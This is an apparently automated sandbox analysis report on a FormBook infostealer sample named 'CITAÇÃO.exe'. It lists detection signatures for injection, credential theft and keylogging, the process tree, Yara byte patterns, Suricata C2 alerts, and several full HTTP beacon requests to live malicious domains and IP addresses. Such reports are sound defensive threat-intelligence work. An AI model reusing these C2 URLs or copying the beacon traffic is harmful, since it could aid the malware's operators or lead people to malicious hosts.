
Windows Analysis Report
CITA#U00c7#U00c3O.exe

Overview

General Information

Sample name: CITA#U00c7#U00c3O.exe (renamed because original name is a hash value)
Original sample name: CITAO.exe
Analysis ID: 1519260
MD5: 05643e059a165f8b6b3b3e4bd0d9f226
SHA1: c1ba7b632f31db543ef178fbd9d48809bf1c2eca
SHA256: ec4594c01b27748273f47aeefc3fc2f3bc67af0b55a72ccd129936bfb0b715b1
Tags: exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • CITA#U00c7#U00c3O.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe" MD5: 05643E059A165F8B6B3B3E4BD0D9F226)
    • svchost.exe (PID: 6960 cmdline: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DJonRIGNYjBRZ.exe (PID: 5780 cmdline: "C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 6160 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • DJonRIGNYjBRZ.exe (PID: 1880 cmdline: "C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1804 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author | Strings
1.2.svchost.exe.2670000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2670000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.2670000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2670000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ParentImage: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, ParentProcessId: 6756, ParentProcessName: CITA#U00c7#U00c3O.exe, ProcessCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ProcessId: 6960, ProcessName: svchost.exe
            Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ParentImage: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, ParentProcessId: 6756, ParentProcessName: CITA#U00c7#U00c3O.exe, ProcessCommandLine: "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe", ProcessId: 6960, ProcessName: svchost.exe


            AV Detection

            Source: CITA#U00c7#U00c3O.exe | Avira: detected
            Source: https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle | Avira URL Cloud: Label: malware
            Source: http://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI | Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI | Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/ | Avira URL Cloud: Label: malware
            Source: http://www.omexai.info/7xi5/ | Avira URL Cloud: Label: malware
            Source: http://www.bola88site.one/3qit/ | Avira URL Cloud: Label: malware
            Source: http://www.tekilla.wtf/fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= | Avira URL Cloud: Label: malware
            Source: CITA#U00c7#U00c3O.exe | ReversingLabs: Detection: 63%
            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: CITA#U00c7#U00c3O.exe | Joe Sandbox ML: detected
            Source: CITA#U00c7#U00c3O.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DJonRIGNYjBRZ.exe, 00000005.00000000.1913555619.00000000007EE000.00000002.00000001.01000000.00000005.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4151235223.00000000007EE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CITA#U00c7#U00c3O.exe, 00000000.00000003.1778079460.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CITA#U00c7#U00c3O.exe, 00000000.00000003.1776550231.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2002269584.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1890366251.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1892230836.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002269584.000000000319E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4153269474.000000000373E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4153269474.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2004390893.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2002161958.0000000003247000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4153839675.0000000003BCC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4151687754.000000000314E000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000002.4153318134.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2397067589.000000000C51C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1971008529.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2002077943.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000003.1951321125.00000000008AB000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_02B6C2C0 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 6_2_02B59B90
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 6_2_02B72399
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 6_2_033904DE

            Networking

            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49753 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49777 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49765 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49781 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49781 -> 85.159.66.93:80
            Source: Joe Sandbox View; IP Address: 172.191.244.62
            Source: Joe Sandbox View; IP Address: 63.250.47.40
            Source: Joe Sandbox View; ASN Name: ATT-INTERNET4 (US)
            Source: Joe Sandbox View; ASN Name: NAMECHEAP-NET (US)
            Source: Joe Sandbox View; ASN Name: AMAZON-02 (US)
            Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe; Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK
                date: Thu, 26 Sep 2024 07:26:23 GMT
                server: Apache
                set-cookie: __tad=1727335583.8586432; expires=Sun, 24-Sep-2034 07:26:23 GMT; Max-Age=315360000
                vary: Accept-Encoding
                content-encoding: gzip
                content-length: 581
                content-type: text/html; charset=UTF-8
                connection: close
                Data Raw / Data Ascii: 581-byte gzip-compressed body omitted
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK
                date: Thu, 26 Sep 2024 07:26:25 GMT
                server: Apache
                set-cookie: __tad=1727335585.2645835; expires=Sun, 24-Sep-2034 07:26:25 GMT; Max-Age=315360000
                vary: Accept-Encoding
                content-encoding: gzip
                content-length: 581
                content-type: text/html; charset=UTF-8
                connection: close
                Data Raw / Data Ascii: 581-byte gzip-compressed body omitted
            Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK
                date: Thu, 26 Sep 2024 07:26:28 GMT
                server: Apache
                set-cookie: __tad=1727335588.3604621; expires=Sun, 24-Sep-2034 07:26:28 GMT; Max-Age=315360000
                vary: Accept-Encoding
                content-encoding: gzip
                content-length: 581
                content-type: text/html; charset=UTF-8
                connection: close
                Data Raw / Data Ascii: 581-byte gzip-compressed body omitted
            Source: global traffic; HTTP traffic detected: GET /2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.elsupertodo.net
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Host: www.omexai.info
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic; HTTP traffic detected: GET /fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
